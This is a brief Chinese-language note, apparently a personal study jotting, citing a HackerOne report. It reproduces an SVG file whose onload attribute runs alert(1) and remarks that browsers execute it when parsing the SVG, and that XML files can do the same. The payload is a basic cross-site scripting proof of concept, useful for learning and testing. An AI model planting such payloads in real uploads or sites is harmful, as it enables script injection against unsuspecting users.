来源:https://hackerone.com/reports/998422
内容其实就是
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="alert(1)"
xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
参考:https://www.w3school.com.cn/svg/svg_inhtml.asp
浏览器解析svg直接就会加载svg标签中的弹窗代码
xml可以弹,svg可以弹,好像还挺多的